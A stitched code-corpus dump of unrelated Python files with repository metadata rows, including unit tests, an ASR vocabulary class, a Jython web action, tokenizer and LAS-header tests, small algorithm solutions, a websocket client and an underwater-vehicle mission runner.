        self.assertRaises(KeyError, itemgetter('foo'), storage)
    def testSetItemNotAllowed(self):
        # The storage is read-only through __setitem__.
        storage = self.storage
        self.assertRaises(RuntimeError, setitem, storage, 'key', None)
    def testIterateWithoutAnnotations(self):
        storage = self.storage
        self.assertEqual(list(storage), [])
    def testIterate(self):
        storage = self.storage
        storage.storage.update(one=None, two=None)
        generator = iter(storage)
        self.assertEqual(set(generator), set(['one', 'two']))
    def testKeys(self):
        storage = self.storage
        storage.storage.update(one=None, two=None)
        self.failUnless(isinstance(storage.keys(), list))
        self.assertEqual(set(storage.keys()), set(['one', 'two']))
    def testNegativeHasKey(self):
        storage = self.storage
        self.assertEqual(storage.has_key('one'), False)
    def testPositiveHasKey(self):
        storage = self.storage
        storage.storage.update(one=None)
        self.assertEqual(storage.has_key('one'), True)
    def testDeleteNonExistingItem(self):
        storage = self.storage
        self.assertRaises(KeyError, delitem, storage, 'foo')
    def testDeleteRemovesItemAndIndex(self):
        # Deleting by uid removes both the data entry and its key index.
        storage = self.storage
        scale = storage.scale(factory=self.factory, foo=23, bar=42)
        self.assertEqual(len(storage), 2)
        del storage[scale['uid']]
        self.assertEqual(len(storage), 0)
def test_suite():
    """Collect this module's tests (classic Zope/Plone test entry point)."""
    from unittest import defaultTestLoader
    return defaultTestLoader.loadTestsFromName(__name__)
| [
"gso@abv.bg"
] | gso@abv.bg |
1e69296fbfffb99ccc5b1dbd9d7b72ffe89f647c | 0c1cf007f9d5d00ceefaf7be57e3f81c1c49fb11 | /lightning_asr/vocabs/vocab.py | 17fabbd392c30c01608d1d345c8c6597f8a21c1f | [
"MIT"
] | permissive | sooftware/lightning-asr | f345f34dce132a6ccdb393b74c1f9bf0e1ccaac8 | 3b4d8222fad15c90a8c9b44ecacd67f309b34124 | refs/heads/main | 2023-04-30T17:46:21.737471 | 2021-05-19T11:56:33 | 2021-05-19T11:56:33 | 357,467,261 | 16 | 5 | MIT | 2021-05-12T14:22:05 | 2021-04-13T07:46:44 | Python | UTF-8 | Python | false | false | 1,539 | py | # MIT License
#
# Copyright (c) 2021 Soohwan Kim
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
class Vocabulary(object):
    """
    Abstract base describing a vocabulary's special-token ids and size.

    Note:
        Do not use this class directly, use one of the sub classes.
    """
    def __init__(self, *args, **kwargs):
        # Sub classes are expected to assign real values to all of these.
        self.sos_id = None
        self.eos_id = None
        self.pad_id = None
        self.blank_id = None
        self.vocab_size = None
    def __len__(self):
        # Raises TypeError until a sub class sets ``vocab_size``.
        return self.vocab_size
    def label_to_string(self, labels):
        raise NotImplementedError
| [
"sooftware@Soohwanui-MacBookPro.local"
] | sooftware@Soohwanui-MacBookPro.local |
79fef1c980fcdf38f5a02fdcb06e729cab57c0de | e5baa5ba65c5cb80b38203b28c064a475aa63693 | /WebContent/mod/topic/new_topic.py | 4897608329e28377dddb01bf792972cf897abd83 | [] | no_license | yxxcrtd/jitar2012 | bbe00b1eb2e505400dcfec396201752c3888199c | ccae07ff44a3cb9dc3d0b75673cbca699fa66b80 | refs/heads/master | 2020-05-31T15:26:40.107486 | 2019-06-05T08:05:22 | 2019-06-05T08:05:22 | 190,352,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,552 | py | #encoding=utf-8
from java.util import Date
from java.util import HashMap
from java.lang import String
from common_data import CommonData
from cn.edustar.jitar.pojos import PlugInTopic
class new_topic(CommonData):
    """Jython web action: lets a logged-in user start a discussion topic
    attached to a parent object identified by ``parentGuid``/``parentType``.

    GET renders the topic form inside the parent's page frame; POST is
    delegated to ``save_or_update``.
    """
    def __init__(self):
        CommonData.__init__(self)
    def execute(self):
        # Both a valid parent reference and a logged-in user are required.
        if self.parentGuid == "" or self.parentType == "":
            self.addActionError(u"无效的访问。")
            return self.ERROR
        if self.loginUser == None:
            self.addActionError(u"请先登录。")
            return self.LOGIN
        self.returl = self.params.safeGetStringParam("returl")
        if request.getMethod() == "POST":
            return self.save_or_update()
        # GET: build the template model and splice it into the page frame.
        map = HashMap()
        map.put("SiteUrl", self.pageFrameService.getSiteUrl())
        map.put("UserMgrUrl", self.pageFrameService.getUserMgrUrl())
        map.put("loginUser", self.loginUser)
        map.put("head_nav", "special_subject")
        map.put("returl", self.returl)
        pagedata = self.pageFrameService.transformTemplate(map, "/WEB-INF/mod/topic/new_topic.ftl")
        page_frame = self.pageFrameService.getFramePage(self.parentGuid, self.parentType)
        page_frame = page_frame.replace("[placeholder_content]", pagedata)
        page_frame = page_frame.replace("[placeholder_title]", u"发起讨论")
        self.writeToResponse(page_frame)
    def save_or_update(self):
        """Validate the POSTed title/content and persist the new topic."""
        t_title = self.params.safeGetStringParam("ttitle")
        t_content = self.params.safeGetStringParam("tcontent")
        if t_title == "" or t_content == "":
            self.addActionError(u"请输入讨论标题或者讨论内容。")
            return self.ERROR
        plugInTopic = PlugInTopic()
        plugInTopic.setTitle(t_title)
        plugInTopic.setCreateDate(Date())
        plugInTopic.setCreateUserId(self.loginUser.userId)
        plugInTopic.setCreateUserName(self.loginUser.trueName)
        plugInTopic.setTopicContent(t_content)
        plugInTopic.setAddIp(self.get_client_ip())
        plugInTopic.setParentGuid(self.parentGuid)
        plugInTopic.setParentObjectType(self.parentType)
        self.topic_svc = __spring__.getBean("plugInTopicService")
        self.topic_svc.addPluginTopic(plugInTopic)
        # Redirect back when a return URL was supplied; otherwise show a
        # success message on the default result page.
        if self.returl == "":
            self.addActionMessage(u"发布成功。")
            return self.SUCCESS
        else:
            response.sendRedirect(self.returl)
| [
"yxxcrtd@gmail.com"
] | yxxcrtd@gmail.com |
21330b565fa24100c359cf64c8463de47eb289ee | 0bc0db1edc610c9f08261c777d06cb1be4b7a524 | /lgp/pythonSpider/ch1/2sequence.py | 456331e43c37d521807a7df0690c84becd95827e | [] | no_license | danpianji/python3.7 | 9bc7f9a765ec76d7d4c5fb413dcdada4f9e8f510 | f66bc7139f9441583b1043d3da11597987e3fbc0 | refs/heads/master | 2020-12-28T14:49:41.410708 | 2019-05-19T10:13:32 | 2019-05-19T10:13:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | # -*- coding: UTF-8 -*-
#序列化操作
# Python 2 demo: serialize a dict to a string with pickle and back.
try:
    import cPickle as pickle
except:
    import pickle
# NOTE(review): 'dict' and 'str' shadow the builtins; acceptable for this
# small demo script, but avoid in real code.
dict = {"name":"lgp", "age":20, "sex":'M'}
str = pickle.dumps(dict)
print str
dict2 = pickle.loads(str)
print dict2
# The serialized string could also be written to a file for persistence.
"liguangpei1@163.com"
] | liguangpei1@163.com |
bcb656a6cc79492be26ef9deb258a8808e3aa15d | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /58DYAThA2dxnAsMpL_16.py | 61ef3bf2cf1af1f68ed181455ccc260b229bfe59 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | """
Create a function which returns a list of _booleans_ , from a given number.
Iterating through the number one digit at a time, append `True` if the digit
is 1 and `False` if it is 0.
### Examples
integer_boolean("100101") ➞ [True, False, False, True, False, True]
integer_boolean("10") ➞ [True, False]
integer_boolean("001") ➞ [False, False, True]
### Notes
Expect numbers with 0 and 1 only.
"""
def integer_boolean(n):
    """Map a string of binary digits to booleans: '0' -> False, '1' -> True."""
    return [digit != "0" for digit in n]
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
a01572aa4eb23712a34425bf2c293005f7247ea3 | 304e75224229786ba64c6ef2124007c305019b23 | /src/easy/test_make_two_arrays_equal_by_reversing_sub_arrays.py | 00f2070eb7ce459d4e058cc5a5255feacc815c15 | [] | no_license | Takuma-Ikeda/other-LeetCode | 9179a8100e07d56138fd3f3f626951195e285da2 | 499616d07011bee730b9967e9861e341e62d606d | refs/heads/master | 2023-04-14T06:09:35.341039 | 2023-04-10T02:29:18 | 2023-04-10T02:29:18 | 226,260,312 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 897 | py | import unittest
from answer.make_two_arrays_equal_by_reversing_sub_arrays import Solution
class TestSolution(unittest.TestCase):
    """Table-driven tests for ``Solution.canBeEqual`` (LeetCode 1460)."""
    def setUp(self):
        # Parallel fixtures: target[i] / arr[i] -> expected answers[i].
        self.target = [
            [1, 2, 3, 4],
            [7],
            [1, 12],
            [3, 7, 9],
            [1, 1, 1, 1, 1],
        ]
        self.arr = [
            [2, 4, 1, 3],
            [7],
            [12, 1],
            [3, 7, 11],
            [1, 1, 1, 1, 1],
        ]
        self.answers = [
            True,
            True,
            True,
            False,
            True,
        ]
    def test_solution(self):
        for i in range(len(self.answers)):
            print('----- TEST NO.%i START -----' % i)
            s = Solution()
            result = s.canBeEqual(self.target[i], self.arr[i])
            self.assertEqual(self.answers[i], result)
if __name__ == "__main__":
    unittest.main()
| [
"el.programdear@gmail.com"
] | el.programdear@gmail.com |
d0d9bc0c393953fc4d66a087de4a0606ec41154a | 558cc75ea0e093f0b27197654bd0162cce688e03 | /social_network/migrations/0026_auto_20200421_1257.py | f3eb7084107ea6ba18e1d6df8806d5a2e038e20b | [] | no_license | seniordev0425/Python-Rafflee | 89766de8bad96ca919a34df2f0820d24b9258808 | 37da2e7a37a0b0b5332ff036f80814598ed57c0b | refs/heads/master | 2022-11-26T20:46:32.082517 | 2020-08-07T03:01:21 | 2020-08-07T03:01:21 | 285,723,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # Generated by Django 2.2.12 on 2020-04-21 12:57
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated: alters SocialAction.twitter_follow_type to a nullable
    # choice field (user_id / screen_name).
    dependencies = [
        ('social_network', '0025_auto_20200421_1249'),
    ]
    operations = [
        migrations.AlterField(
            model_name='socialaction',
            name='twitter_follow_type',
            field=models.CharField(choices=[('user_id', 'USER_ID'), ('screen_name', 'SCREEN_NAME')], max_length=15, null=True),
        ),
    ]
| [
"seniordev0425@gmail.com"
] | seniordev0425@gmail.com |
1966df5213bd6122c4be02f75e2f4bcc6599ffe1 | 21962ae2b724f4679683dab3f30306f59e6da834 | /pylastests/test_header.py | 49e238a807790d4374c6b55a4018de7aed87d511 | [
"BSD-3-Clause"
] | permissive | GeolearnAI/pylas | 7b54178809ee6f7a60525f6ad85ad58385b99310 | 7a5bbada702d927e4f78d5c2883dcc98f808d831 | refs/heads/master | 2022-09-18T11:28:45.593005 | 2020-06-06T12:23:58 | 2020-06-06T12:23:58 | 278,429,549 | 0 | 0 | null | 2020-07-09T17:32:31 | 2020-07-09T17:32:31 | null | UTF-8 | Python | false | false | 3,146 | py | import pylas
from pylastests import test_common
all_las_but_1_4 = test_common.all_las_but_1_4
def test_number_of_points_return_is_updated(all_las_but_1_4):
    """Setting return numbers updates the header's per-return point counts
    after a write/read round trip (pre-1.4 formats)."""
    las = all_las_but_1_4
    nb_points = len(las.points_data)
    nb_slice = 3
    r = las.return_number
    # Assign return number i to the i-th third of the points.
    for i in reversed(range(nb_slice)):
        r[i * (nb_points // nb_slice): (i + 1) * (nb_points // nb_slice)] = i
    las.return_number = r
    las = test_common.write_then_read_again(las)
    assert (
        tuple(las.header.number_of_points_by_return[:nb_slice])
        == (nb_points // nb_slice,) * nb_slice
    )
    # All remaining return slots must stay zero.
    assert tuple(las.header.number_of_points_by_return[nb_slice:]) == (0,) * (
        len(las.header.number_of_points_by_return) - nb_slice
    )
def test_nb_points_return_1_4():
    """Same per-return bookkeeping for the 1.4 format's 15 return slots."""
    las = pylas.read(test_common.test1_4_las)
    r = las.return_number
    # One point each for returns 0..13, everything else return 15.
    for i in reversed(range(15)):
        r[i] = i
    r[14:] = 15
    las.return_number = r
    las = test_common.write_then_read_again(las)
    assert tuple(las.header.number_of_points_by_return) == ((1,) * 14) + (
        len(las.points_data) - 14,
    )
def test_header_copy():
    """A shallow header copy must be independent of the original."""
    import copy
    las = pylas.read(test_common.simple_las)
    header_copy = copy.copy(las.header)
    assert header_copy.point_format_id == las.header.point_format_id
    assert header_copy.version == las.header.version
    # Mutating the copy must not affect the source header.
    header_copy.point_format_id = 0
    assert header_copy.point_format_id != las.header.point_format_id
    assert header_copy.version == las.header.version
def test_set_uuid():
    """The project UUID survives a write/read round trip."""
    import uuid
    las = pylas.read(test_common.simple_las)
    u = uuid.uuid4()
    las.header.uuid = u
    las = test_common.write_then_read_again(las)
    assert las.header.uuid == u
def test_set_offsets():
    """Setting ``offsets`` updates the individual x/y/z offset fields."""
    header = pylas.headers.HeaderFactory.new('1.2')
    header.offsets = [0.5, 0.6, 0.7]
    assert 0.5 == header.x_offset
    assert 0.6 == header.y_offset
    assert 0.7 == header.z_offset
    assert [0.5, 0.6, 0.7] == list(header.offsets)
def test_set_scales():
    """Setting ``scales`` updates the individual x/y/z scale fields."""
    header = pylas.headers.HeaderFactory.new('1.2')
    header.scales = [0.001, 0.001, 0.01]
    assert 0.001 == header.x_scale
    assert 0.001 == header.y_scale
    assert 0.01 == header.z_scale
    assert [0.001, 0.001, 0.01] == list(header.scales)
def test_set_maxs():
    """Setting ``maxs`` updates the individual x/y/z maximum fields."""
    header = pylas.headers.HeaderFactory.new('1.2')
    values = [42.0, 1337.42, 553.3]
    header.maxs = values
    assert values[0] == header.x_max
    assert values[1] == header.y_max
    assert values[2] == header.z_max
    assert values == list(header.maxs)
def test_set_mins():
    """Setting ``mins`` updates the individual x/y/z minimum fields."""
    header = pylas.headers.HeaderFactory.new('1.2')
    values = [42.0, 1337.42, 553.3]
    header.mins = values
    assert values[0] == header.x_min
    assert values[1] == header.y_min
    assert values[2] == header.z_min
    assert values == list(header.mins)
def test_point_count_stays_synchronized():
    """``header.point_count`` tracks the point record array's length."""
    las = pylas.read(test_common.simple_las)
    assert las.header.point_count == len(las.points_data)
    las.points = las.points[:120]
    assert 120 == las.header.point_count
    assert las.header.point_count == len(las.points_data)
| [
"thomas.montaigu@laposte.net"
] | thomas.montaigu@laposte.net |
905af0071c737e9ee131d302fd623eb668532ec3 | ef3a7391b0a5c5d8e276355e97cbe4de621d500c | /venv/Lib/site-packages/spacy/tests/lang/en/test_text.py | a7ebde9898add7b47514cf89f800b00e9f28a74b | [
"Apache-2.0"
] | permissive | countBMB/BenjiRepo | 143f6da5d198ea6f06404b4559e1f4528b71b3eb | 79d882263baaf2a11654ca67d2e5593074d36dfa | refs/heads/master | 2022-12-11T07:37:04.807143 | 2019-12-25T11:26:29 | 2019-12-25T11:26:29 | 230,090,428 | 1 | 1 | Apache-2.0 | 2022-12-08T03:21:09 | 2019-12-25T11:05:59 | Python | UTF-8 | Python | false | false | 1,898 | py | # coding: utf-8
from __future__ import unicode_literals
import pytest
from spacy.lang.en.lex_attrs import like_num
def test_en_tokenizer_handles_long_text(en_tokenizer):
    # Smoke test: a multi-line news excerpt tokenizes into the expected count.
    # NOTE(review): the assertion is tied to this exact fixture text; any edit
    # to the string changes the token count.
    text = """Tributes pour in for late British Labour Party leader
Tributes poured in from around the world Thursday
to the late Labour Party leader John Smith, who died earlier from a massive
heart attack aged 55.
In Washington, the US State Department issued a statement regretting "the
untimely death" of the rapier-tongued Scottish barrister and parliamentarian.
"Mr. Smith, throughout his distinguished"""
    tokens = en_tokenizer(text)
    assert len(tokens) == 76
# Each sample sentence must split into exactly `length` tokens; the ice-age
# case is a known tokenizer limitation and is marked xfail.
@pytest.mark.parametrize(
    "text,length",
    [
        ("The U.S. Army likes Shock and Awe.", 8),
        ("U.N. regulations are not a part of their concern.", 10),
        ("“Isn't it?”", 6),
        ("""Yes! "I'd rather have a walk", Ms. Comble sighed. """, 15),
        ("""'Me too!', Mr. P. Delaware cried. """, 11),
        ("They ran about 10km.", 6),
        pytest.param(
            "But then the 6,000-year ice age came...", 10, marks=pytest.mark.xfail()
        ),
    ],
)
def test_en_tokenizer_handles_cnts(en_tokenizer, text, length):
    tokens = en_tokenizer(text)
    assert len(tokens) == length
# The `like_num` lexical attribute should flag numerals, grouped numbers,
# decimals, spelled-out numbers and fractions — but not ordinary words.
@pytest.mark.parametrize(
    "text,match",
    [
        ("10", True),
        ("1", True),
        ("10,000", True),
        ("10,00", True),
        ("999.0", True),
        ("one", True),
        ("two", True),
        ("billion", True),
        ("dog", False),
        (",", False),
        ("1/2", True),
    ],
)
def test_lex_attrs_like_number(en_tokenizer, text, match):
    tokens = en_tokenizer(text)
    # Each fixture is a single token; check its like_num flag.
    assert len(tokens) == 1
    assert tokens[0].like_num == match
@pytest.mark.parametrize("word", ["eleven"])
def test_en_lex_attrs_capitals(word):
    """like_num must be case-insensitive for spelled-out numbers."""
    for variant in (word, word.upper()):
        assert like_num(variant)
| [
"bengmen92@gmail.com"
] | bengmen92@gmail.com |
834f1bf7004dbffd444b639a44a6dd308b70ec95 | 796b8a166edc28dd04d23244b698742a607bc23f | /Leetcode/140. Word Break II.py | f899b9fa0812e2d472653987c6dc2e7d94fa7583 | [] | no_license | brlala/Educative-Grokking-Coding-Exercise | 54f18309d89784fbf9452b5b609cd30e54378c46 | e50dc0642f087f37ab3234390be3d8a0ed48fe62 | refs/heads/master | 2023-04-22T07:34:37.360508 | 2021-05-02T11:16:47 | 2021-05-02T11:16:47 | 299,006,488 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 789 | py | class Solution:
def wordBreak(self, s: str, wordDict: list[str]) -> list[str]:
"""
https://leetcode.com/problems/word-break-ii/discuss/44368/Python-easy-to-understand-solutions-(memorization%2BDFS-DP%2BDFS)
"""
memo = {}
return self.dfs(s, set(wordDict), memo)
def dfs(self, s, wordDict, memo):
if s in memo:
return memo[s]
if not s:
return [""]
res = []
for i in range(1, len(s) + 1):
if s[:i] in wordDict:
for word in self.dfs(s[i:], wordDict, memo):
res.append(s[:i] + (" " if word else "") + word)
memo[s] = res
return res
a = Solution()
a.wordBreak(s="catsanddog", wordDict=["cat", "cats", "and", "sand", "dog"])
| [
"liheng@pand.ai"
] | liheng@pand.ai |
a9d4ac0dc4600aad5c813e4f10bbfc32474689da | 5c099927aedc6fdbc515f40ff543c65b3bf4ec67 | /algorithms/reach-a-number/src/Solution.py | d0db1844032445cbf8a4d7b18d9dca9e6ff0fe52 | [] | no_license | bingzhong-project/leetcode | 7a99cb6af1adfbd9bb1996a7f66a65679053c478 | ba82e7d94840b3fec272e4c5f82e3a2cfe4b0505 | refs/heads/master | 2020-04-15T09:27:33.979519 | 2020-03-10T03:43:07 | 2020-03-10T03:43:07 | 164,550,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | py | class Solution:
def reachNumber(self, target: int) -> int:
target = abs(target)
res = 0
sum = 0
while sum < target or (sum - target) % 2 == 1:
res += 1
sum += res
return res
| [
"zhongyongbin@foxmail.com"
] | zhongyongbin@foxmail.com |
149ae6b89e08984c8892fd21814a9ce971fb68fc | cad9c13ad5864317d7687b44f39db42a402f36f0 | /lec03_function/memory_model.py | e0d53d8b99bd2f5313bda8b0570513bc336febf0 | [] | no_license | handaeho/lab_python | 12b686eb0d57358509f2d0cd607064deced5b25d | da068ea62682ffa70c7d23dde4ef132c49a81364 | refs/heads/master | 2020-11-26T08:22:27.656109 | 2020-04-13T02:28:47 | 2020-04-13T02:28:47 | 229,013,932 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,147 | py | """
파이썬 메모리 모델 - 파이썬이 변수들의 메모리 공간을 관리하는 방법.
"""
# Demonstrates CPython's memory model: how variable assignment binds names
# to objects, small-int/string caching, and aliasing of mutable objects.
n1 = 1
print(f'주소 : {id(n1)}, 저장된 값 : {n1}')  # address : 140719357063440, stored value : 1
n2 = n1
print(f'주소 = {id(n2)}, 저장된 값 = {n2}')  # address = 140719357063440, stored value = 1
n2 = 2
print(f'주소 = {id(n2)}, 저장된 값 = {n2}')  # address = 140719357063472, stored value = 2
n3 = 1
print(f'주소 = {id(n3)}, 저장된 값 = {n3}')  # address = 140719357063440, stored value = 1
n3 = 3 - 1
print(f'주소 = {id(n3)}, 저장된 값 = {n3}')  # address = 140719357063472, stored value = 2
s1 = 'abc'
s2 = 'abc'
print(f'주소 = {id(s1)}, 저장된 값 = {s1}')  # address = 2376176854256, stored value = abc
print(f'주소 = {id(s2)}, 저장된 값 = {s2}')  # address = 2376176854256, stored value = abc
# Equal values share one address => numbers/strings are cached (reused) by CPython.
# Objects other than numbers/strings get a fresh address even when equal
# (no caching; a new object is created each time).
list1 = [1, 2, 3]
list2 = [1, 2, 3]
print(f'주소 = {id(list1)}, 저장된 값 = {list1}')  # address = 2290452484680, stored value = [1, 2, 3]
print(f'주소 = {id(list2)}, 저장된 값 = {list2}')  # address = 2290452485192, stored value = [1, 2, 3]
list3 = list2
print(f'주소 = {id(list3)}, 저장된 값 = {list3}')  # list3 references list2, so both share the same address.
list2[0] = 100
print(list2, list3)  # [100, 2, 3] [100, 2, 3]
# Changing list2 also changed list3 ~~~> because they share one address (same object).
list3[1] = 200
print(list2, list3)  # [100, 200, 3] [100, 200, 3]
# Likewise, mutating list3 mutates list2.
# Summary: list1 and list2 are different objects (different addresses);
# list2 and list3 are the same object (same address).
# '==' operator VS 'is' operator
a = [1, 2, 3]
b = [1, 2, 3]
print(f'== : {a == b}, is : {a is b}')  # == : True, is : False
# '==' ~~~~~> same *value*? / 'is' ~~~~~> same *address* (identity)?
"mrdh94@naver.com"
] | mrdh94@naver.com |
dd9bf12890563e9f4e394367ee17592436c4db4e | c2210b7012d2cd608ba1c350169107fe79584568 | /helmet_seatbelt/src/python3/websocket-test0.py | 05cf8c319d37e16fb10b6e2696f67f4e190b8d93 | [] | no_license | ISCAS007/demo | 9165eb2765f35a93abf790977358b55a39cb5d7d | 92addff2e4a09f58ac405b9ce155f79604ac8169 | refs/heads/master | 2023-05-09T18:14:38.153027 | 2019-12-03T03:22:38 | 2019-12-03T03:22:38 | 375,907,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | #!/usr/bin/env python3
import asyncio
import websockets
import sys
# FIX: the generator-based `@asyncio.coroutine` / `yield from` style was
# deprecated in Python 3.8 and removed in 3.10; use native async/await.
# Behavior is unchanged: connect, send argv[1], print the echoed reply.
async def hello():
    """Connect to the websocket server, send sys.argv[1], print the reply."""
    websocket = await websockets.connect('ws://t.qdrise.com.cn:1234/')
    try:
        name = sys.argv[1]
        await websocket.send(name)
        print("> {}".format(name))
        greeting = await websocket.recv()
        print("< {}".format(greeting))
    finally:
        # Always close the connection, even if send/recv raised.
        await websocket.close()
asyncio.get_event_loop().run_until_complete(hello())
| [
"youdaoyzbx@163.com"
] | youdaoyzbx@163.com |
c3d423561ba81e648124b4013b007394c0427eff | e665fe109ce9823d965e303ca8677b5a065ad9df | /mission/runner.py | d1907d30f805a18b3e0801c7c0ac9525481d2f53 | [
"BSD-3-Clause"
] | permissive | deciament/software | 822a704dfaab84f5260a284271cdec1b3664b94f | 06ad1d9ea239d116252510beed248bc6031cd622 | refs/heads/master | 2021-01-14T12:40:04.946245 | 2015-12-31T02:28:33 | 2015-12-31T02:28:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,653 | py | #!/usr/bin/env python3.4
import time, argparse, traceback, sys, datetime, os, shm
# Note: this is a hack; will only function if your PYTHONPATH is solely the standard software one (~/cuauv/software; i.e. the root directory of the repo)
pythonpath = os.environ.get('PYTHONPATH')
sys.path.append(pythonpath + '/mission')
from auv_python_helpers.colors import *
from mission.framework.auxiliary import zero_outputs
from mission.framework.task import Task
from auvlog.client import log as auvlog
def foldl(f, acc, l):
    """Left-fold `f` over iterable `l` starting from `acc`.

    Equivalent to functools.reduce(f, l, acc); delegate to the stdlib
    instead of re-implementing it.  Local import keeps the module's
    top-level dependencies unchanged.
    """
    from functools import reduce
    return reduce(f, l, acc)
def exit(status):
    # NOTE(review): intentionally shadows the builtin exit() within this
    # module.  Clears the mission-start flag in shared memory before
    # terminating so the rest of the system sees the mission as stopped.
    shm.mission_start_switch.mission_start.set(0)
    sys.exit(status)
# Command-line interface for the mission runner.
parser = argparse.ArgumentParser()
parser.add_argument(
    '-n',
    '--nticks',
    help='Run N mission ticks instead of running continuously.',
    default=None,
    type=int)
parser.add_argument(
    '-t',
    '--task',
    help='Task name to load; default "Main".',
    default='Main',
    type=str)
parser.add_argument(
    '-f',
    '--file',
    help='File from which to load the task; default "teagle.py".',
    default='teagle.py',
    type=str)
parser.add_argument(
    '-r',
    '--rate',
    help='Number of mission ticks to run per second; default 50',
    default=50,
    type=int)
# BUG FIX: `type=bool` is a trap with argparse -- ANY non-empty string
# (including "False") converts to True.  A store_true flag gives the same
# args.quiet bool with the same False default, minus the footgun.
parser.add_argument(
    '-q',
    '--quiet',
    help="Don't ouput diagnostic messages.",
    action='store_true')
args = parser.parse_args()
def fmt(n_ticks, msg):
    # Build one colored status line: timestamp, subsystem tag, tick, message.
    return '[{0}] ({1}) Tick: {2} Message: {3}'.format(red(datetime.datetime.now().isoformat()), yellow('MISSION'), green(str(n_ticks)), msg)
def log(n_ticks, msg):
    # Print a status line to stdout unless --quiet was given.
    if not args.quiet:
        print(fmt(n_ticks, msg))
def error(n_ticks, msg):
    # Always write to stderr (ignores --quiet) and flush immediately so the
    # message is visible even if the process dies right after.
    sys.stderr.write(fmt(n_ticks, msg) + "\n")
    sys.stderr.flush()
def logR(n_ticks, msg):
    # Like log(), but rewrites the same terminal line: trailing '\r' and no
    # newline, so the per-tick output does not scroll.
    if not args.quiet:
        print(fmt(n_ticks, msg) + '\r', end = '')
if __name__ == '__main__':
    # Import the mission module named by --file (dots resolved attribute by
    # attribute, since __import__ of "a.b" returns package "a").
    try:
        module_name = args.file[:-3] if args.file[-3:] == '.py' else args.file
        split = module_name.split('.')
        # Python imports are ludicrous.
        module = __import__(module_name)
        print("HELLLLO")  # NOTE(review): leftover debug output
        module = foldl(lambda x, y: getattr(x, y), __import__(split[0]), split[1:])
    except ImportError as e:
        error(0, 'Error importing module "{0}". Perhaps this file does not exist or is not in your PYTHONPATH.'.format(args.file))
        error(0, 'Traceback: \n\n{0}'.format(traceback.format_exc()))
        exit(1)
    # Resolve the task object (--task) inside the imported module.
    try:
        task = getattr(module, args.task)
    except AttributeError:
        error(0, 'Error loading task "{0}". Perhaps this task does not exist within the specified file or was misspelled.'.format(args.task))
        exit(1)
    n_ticks = 0
    last = time.time()
    try:
        log(0, 'Starting mission.')
        shm.mission_start_switch.mission_start.set(1)
        # Main loop: call task() at roughly --rate Hz until it reports
        # finished, --nticks is reached, or an exception escapes.
        while args.nticks is None or n_ticks < args.nticks:
            start = time.time()
            delta = start - last
            try:
                task()
            except Exception as e:
                # NOTE(review): swallows per-tick task exceptions so one bad
                # tick does not abort the mission; only printed, not logged.
                print(e)
            # Sleep off the remainder of the tick period (never negative).
            time.sleep(max((1 / args.rate) - delta, 0))
            if hasattr(task, 'finished') and task.finished:
                error(n_ticks, 'Mission complete.')
                zero_outputs()
                exit(0)
            else:
                logR(n_ticks, 'Ticked.')
                n_ticks += 1
                last = start
            if args.nticks == n_ticks:
                log(n_ticks, 'Mission complete.')
                zero_outputs()
                exit(0)
        error(n_ticks, "Should not be here!")
    except Exception as e:
        # Any unexpected error: report, zero actuator outputs for safety.
        error(n_ticks, 'Exception encountered. Traceback: \n\n{0}'.format(traceback.format_exc()))
        error(n_ticks, 'Mission terminated; zeroing outputs.')
        zero_outputs()
        # exit(1)
    except KeyboardInterrupt:
        # Ctrl-C is a clean shutdown (KeyboardInterrupt is not an Exception,
        # so the branch above does not catch it).
        zero_outputs()
        exit(0)
| [
"software@cuauv.org"
] | software@cuauv.org |
c26fd50d1c7bcce85657403551fdc8dcd43b54cd | c3614e4bc024f4c0f619eaa05ce3f2e068d2e82d | /cutting_game.py | e4236f6016472df8e83d460246c1aa1bf42ee696 | [] | no_license | yukikawana/aoj | 68b2853b52975d4d066cd91b8cc6ee57c7c7d5c1 | cf53dc9957f02185e8b83b9c2ee28079ba88b2a5 | refs/heads/master | 2020-04-01T17:55:29.259738 | 2018-10-17T09:15:44 | 2018-10-17T09:15:44 | 153,459,439 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | from utils import input_int
# Memo table shared across grundy() calls: (H, W) -> grundy number.
mem = {}


def grundy(H, W):
    """Grundy number of an H x W board in the cutting game (memoized).

    A move cuts the board along one axis into two pieces; both pieces must
    keep a side of length >= 2, hence the range(2, H - 1) bounds.  The
    grundy number is the mex of XORs of the two resulting sub-games.
    """
    key = (H, W)
    if key in mem:
        return mem[key]
